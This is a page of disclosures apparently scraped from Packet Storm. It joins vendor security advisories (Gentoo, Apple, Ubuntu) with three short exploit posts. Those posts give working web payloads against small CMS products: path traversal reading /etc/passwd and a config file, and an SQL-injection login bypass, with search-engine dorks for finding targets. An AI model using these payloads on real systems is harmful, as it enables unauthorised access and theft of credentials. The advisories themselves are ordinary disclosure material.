Gentoo Linux Security Advisory 202309-4 - An arbitrary file overwrite vulnerability has been discovered in RAR and UnRAR, potentially resulting in arbitrary code execution. Versions greater than or equal to 6.23 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202309-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: RAR, UnRAR: Arbitrary File Overwrite  
     Date: September 17, 2023  
     Bugs: #843611, #849686, #912652  
       ID: 202309-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

An arbitrary file overwrite vulnerability has been discovered in RAR and  
UnRAR, potentially resulting in arbitrary code execution.

Background  
==========

RAR and UnRAR provide command line interfaces for compressing and  
decompressing RAR files.

Affected packages  
=================

Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
app-arch/rar    < 6.23        >= 6.23  
app-arch/unrar  < 6.2.10      >= 6.2.10

Description  
===========

Due to an error in the validation of symbolic links within archives, RAR  
and UnRAR can potentially write files to a directory which is outside of  
the intended unpack directory.

Impact  
======

If the user running RAR or UnRAR extracts a malicious archive, the  
archive could overwrite a file such as the user's shell initialization  
scripts, potentially resulting in arbitrary code execution in the  
context of that user.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All RAR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-arch/rar-6.23"

All UnRAR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-arch/unrar-6.2.10"

References  
==========

[ 1 ] CVE-2022-30333  
      https://nvd.nist.gov/vuln/detail/CVE-2022-30333

[ 2 ] CVE-2023-40477  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40477

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202309-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org [4].

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202309-04

Gentoo Linux Security Advisory 202309-3 - Multiple vulnerabilities have been discovered in GPL Ghostscript, the worst of which could result in remote code execution. Versions greater than or equal to 10.01.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202309-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GPL Ghostscript: Multiple Vulnerabilities  
     Date: September 17, 2023  
     Bugs: #904245, #910294  
       ID: 202309-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in GPL Ghostscript, the  
worst of which could result in remote code execution.

Background  
==========

Ghostscript is an interpreter for the PostScript language and for PDF.

Affected packages  
=================

Package                   Vulnerable    Unaffected  
------------------------  ------------  ------------  
app-text/ghostscript-gpl  < 10.01.2     >= 10.01.2

Description  
===========

Multiple vulnerabilities have been discovered in GPL Ghostscript. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All GPL Ghostscript users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-text/ghostscript-gpl-10.01.2"

References  
==========

[ 1 ] CVE-2022-2085  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2085  
[ 2 ] CVE-2023-28879  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28879  
[ 3 ] CVE-2023-36664  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36664

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202309-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202309-03

Gentoo Linux Security Advisory 202309-2 - Multiple vulnerabilities have been found in Wireshark, the worst of which could result in denial of service. Versions greater than or equal to 4.0.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202309-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Wireshark: Multiple Vulnerabilities  
     Date: September 17, 2023  
     Bugs: #878421, #899548, #904248, #907133  
       ID: 202309-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Wireshark, the worst of  
which could result in denial of service.

Background  
==========

Wireshark is a versatile network protocol analyzer.

Affected packages  
=================

Package                 Vulnerable    Unaffected  
----------------------  ------------  ------------  
net-analyzer/wireshark  < 4.0.6       >= 4.0.6

Description  
===========

Multiple vulnerabilities have been discovered in Wireshark. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Wireshark users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-4.0.6"

References  
==========

[ 1 ] CVE-2022-3725  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3725  
[ 2 ] CVE-2023-0666  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0666  
[ 3 ] CVE-2023-0667  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0667  
[ 4 ] CVE-2023-0668  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0668  
[ 5 ] CVE-2023-1161  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1161  
[ 6 ] CVE-2023-1992  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1992  
[ 7 ] CVE-2023-1993  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1993  
[ 8 ] CVE-2023-1994  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1994  
[ 9 ] CVE-2023-2854  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2854  
[ 10 ] CVE-2023-2855  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2855  
[ 11 ] CVE-2023-2856  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2856  
[ 12 ] CVE-2023-2857  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2857  
[ 13 ] CVE-2023-2858  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2858  
[ 14 ] CVE-2023-2879  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2879  
[ 15 ] CVE-2023-2952  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2952  
[ 16 ] WNPA-SEC-2022-07  
[ 17 ] WNPA-SEC-2023-08  
[ 18 ] WNPA-SEC-2023-09  
[ 19 ] WNPA-SEC-2023-10  
[ 20 ] WNPA-SEC-2023-11

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202309-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202309-02

Apple Security Advisory 2023-09-11-3 - macOS Big Sur 11.7.10 addresses buffer overflow and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-09-11-3 macOS Big Sur 11.7.10

macOS Big Sur 11.7.10 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213915.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
actively exploited.  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2023-41064: The Citizen Lab at The University of Torontoʼs Munk  
School

macOS Big Sur 11.7.10 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmT/m3MACgkQX+5d1TXa  
IvqNSg//bbzgVN2E8yAjEnjXK08rQlR7TmCxvDCa9s2GI3hPYb881pMDz2kG4ntu  
C8MaKgYwQ8f6DKowxL2bJAXz9p48tzfHEcxVVCW3vwel0MrstLQRllrv4GrRrU2T  
/kkOWs4WZPQYMuvf+j08+KlGOWwPdhxNBlkzoZKe1Sq0DKFOBhdwnBfUsQgREMK+  
zFz7iVYHKCgAs8hQwOA7mmxa7W42PO5XuBh2d4bxsjiV+63Z4vIhy3uiXrqGDolT  
pOLsOXpRaLxDeVTi7/AKBJcR+ScC/wTinCBaFuELqQsXeYVKJeLl901MYa54VZtf  
6x+7c/QOKf8LUQR58VH9uB1cRGaC4rI0GfGBMZAR3C1xhM0TRzHuH6HOsBK2ZQva  
OprPGZ8aNb1XhuuZeYYxNnXOtmto8V8ZynBzjoPv5P3BeaBgRbpOnlIsamSTQUeb  
BSLnKQ6MbDbrGBQHcqKhdYyL65EzXGfoYgLbKG+FdzoaTdJ8EO+FXum6smPcHEvm  
uzHkCQvYPZ6ZpeGQ3OPrD0mqTrqdI5JwdM1Qj3ks5srGHH8UYK1k1TQx5kK/5MX1  
1ASkIhexyGtDS3DNVWOaDniRXA6bMNrJCNQC7PU5O1Py0kR1gITB9WAP+LOQ4PBF  
Of9Y2FxFxHMYJ40gHwa5e/mo4Sf5fvnr9WUU9/34VC5f+tTI47M=  
=bfbZ  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-09-11-3

Apple Security Advisory 2023-09-11-2 - macOS Monterey 12.6.9 addresses buffer overflow and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-09-11-2 macOS Monterey 12.6.9

macOS Monterey 12.6.9 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213914.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

ImageIO  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
actively exploited.  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2023-41064: The Citizen Lab at The University of Torontoʼs Munk  
School

macOS Monterey 12.6.9 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmT/m3IACgkQX+5d1TXa  
IvrzPg//a+Al1VjRmASSN1lWptcH3EN4AcviKdzPAcl3Wtlh/28UFzIuMkgyH7B/  
e0VUEgqo+4RqyYVfmWTZJBQ9J0otX3M+wG9XRVt3VlgwStqQ9+sjK1nRIMKq3YO6  
KMVM9TggVAqEQOOTvdPhsb439RoP2q8kAiQnxw0r/CqzWkPnLvDTdLGWW5WO4G2Q  
tFv7z2nV4aPsmZWDwsfc4S8UyrAP+57iBLpegwD6kLaLiRFOm4ZS/bPmWYck0HDK  
qojdx6gJ3fYVCoMexiJuBLpJWdCA582f8SfsgYj1/pIwmTC2Vu5HZz3FxF6ULAuY  
rbmcZO2zA9w30XgjPDtWQ3l00mVi8Pnod4gDD0bN2aYuDtTXWQ7U/zmkT65kDLPO  
uQCZmBAeRLaaUnBlmGRpHBe7zqLlUTU+AcjzRwcXs7WnEuZ59WVCkMlQIELmAx2m  
/2jEcMMBe9GNnxEcSa7N0HBbuPHrakC5JA4u63SYeb2NHe9i5PPlwQvRHJJ+Atps  
LpsqgdSNk0LmLgldzglIVdhoRBo6F3i1BuIeof0STBLgl3AM1jJJWeL0wPv5RV95  
eIN+Uvs7ni1OUZUq0Io7vAg1alyZAv6TZEz8venYA0J+2WxFVu/jOaOxwGJUyzQf  
7fblA7wBfxZ+TdZKzaU6OUCoJP/g/gDWzrBG+0EJGH9dcxJP8no=  
=I1tR  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-09-11-2

Apple Security Advisory 2023-09-11-1 - iOS 15.7.9 and iPadOS 15.7.9 addresses buffer overflow and code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-09-11-1 iOS 15.7.9 and iPadOS 15.7.9iOS 15.7.9 and iPadOS 15.7.9 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT213913.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.ImageIOAvailable for: iPhone 6s (all models), iPhone 7 (all models), iPhone SE(1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch(7th generation)Impact: Processing a maliciously crafted image may lead to arbitrarycode execution. Apple is aware of a report that this issue may have beenactively exploited.Description: A buffer overflow issue was addressed with improved memoryhandling.CVE-2023-41064: The Citizen Lab at The University of Torontoʼs MunkSchoolThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 15.7.9 and iPadOS 15.7.9".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmT/m3IACgkQX+5d1TXaIvq6Ww//WB9pTBOCCs5nm4b199CRT+zde3vODQd70Jk6hux40O+XnoObqqpB3ZxDeiklegUOLEbGhgKqHyLMWxDUXCx0FaQMx2EzzwfRkYGSRnreDnFLd1V50mC4kWukw711Y6ZEdwrV9DhK0/M/3lzbhOMt4lLrPYeb4i2LJ/zFsqVTW8lrLqITkA3RapnsMtMH/zXzL5PYmNMP8Vbjudb+9T0LQ5+WEh4JvGheVnxe/X7Ijqv+v5MUUbp6U31jxvTrhcKKsOqSgJrBTxoE+AICD7uEFNpcdxXo+yFOfFP7F//iXVWGYGpjb/xmmxiWZGFKhQkuM1wk9tCLZEhQYVRplKAtxTTEzoXfdCLWbHn6drxX2oFA+BThwnInUO2zAGcy2MOoPK9F+JZPheMGdE9ZJa/B8s/Vtim1KL6nQukVXpqtC77RQHo2c5IeDQBSnzhdxLxAL2qqENLt/rrY3tQvvPt5aithjJ4y4wwSUeeavcEqyHbum2XavwmK7YpHiGRdb76wQFd7gISPlgEuDW9mK8bsrNOUk9UDu6EgXrIGgjpvT/YSd779UgxcTUusBfWigHBgtvXF8ju5QrECxNSSRz/Byh+j7Pbf6iVMrvU9TyIJrhIhtHNWMx1fwQVp+eIp5LLjSc1OM0swUL1qtsgXlxcVLkMc0HmFd1BVQRi1g5Pdyp0==+8rR-----END PGP SIGNATURE-----

Apple Security Advisory 2023-09-11-1

KPOT Stealer CMS 2.0 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : KPOT Stealer CMS v2.0 Directory Traversal Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md                       |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] onfected file: download.php   <?php     if (isset($_GET['file']))     {     $file = $_GET['file'];     header('Content-Disposition: attachment; filename="'.basename($file).'"');     header('Content-Length: ' . filesize($file));     readfile($file);   }   ?>[+] use payload : download.php?file=../../../../../../../../../etc/passwd[+] http://127.0.0.1/KPOT/download.php?file=../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

KPOT Stealer CMS 2.0 Directory Traversal

KPK CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : KPK CMS v1.0 Auth by pass Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit)                                               | | # Vendor    : http://www.kpkcomputer.com/                                                                                        |  | # Dork      : "Developed by KPK Computer"                                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user & pass = ' or 0=0 #[+] http://Targetthai-modeling-associationorg/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

KPK CMS 1.0 SQL Injection

Karenderia MRS version 5.3 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Karenderia MRS v5.3 Directory Traversal Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(64-bit)                                               | | # Vendor    : https://github.com/ashishvazirani/food                                                                             |  | # Dork      : 1149 N GOWER ST, 90038 United States Call Us 111111111                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /exportmanager/ajax/getfiles?f=/../../protected/config/main.php[+] http://127.0.0.1Trgtbastisapp.com/kmrs/exportmanager/ajax/getfiles?f=/../../protected/config/main.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Karenderia MRS 5.3 Directory Traversal

Ubuntu Security Notice 6375-1 - Florian Fainelli discovered that atftp did not properly manage requests made to a non-existent file, which could lead to a crash. A remote attacker could possibly use this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6375-1September 15, 2023atftp vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.04 LTSSummary:atftp could be made to crash if it received specially crafted networktraffic.Software Description:- atftp: Advanced TFTP Server and ClientDetails:Florian Fainelli discovered that atftp did not properly manage requestsmade to a non-existent file, which could lead to a crash. A remoteattacker could possibly use this issue to cause a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   atftpd                          0.8.0-3build0.23.04.1Ubuntu 22.04 LTS:   atftpd                          0.7.git20210915-4build1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6375-1   https://launchpad.net/bugs/1989816Package Information:   https://launchpad.net/ubuntu/+source/atftp/0.8.0-3build0.23.04.1https://launchpad.net/ubuntu/+source/atftp/0.7.git20210915-4build1

Source

Packet Storm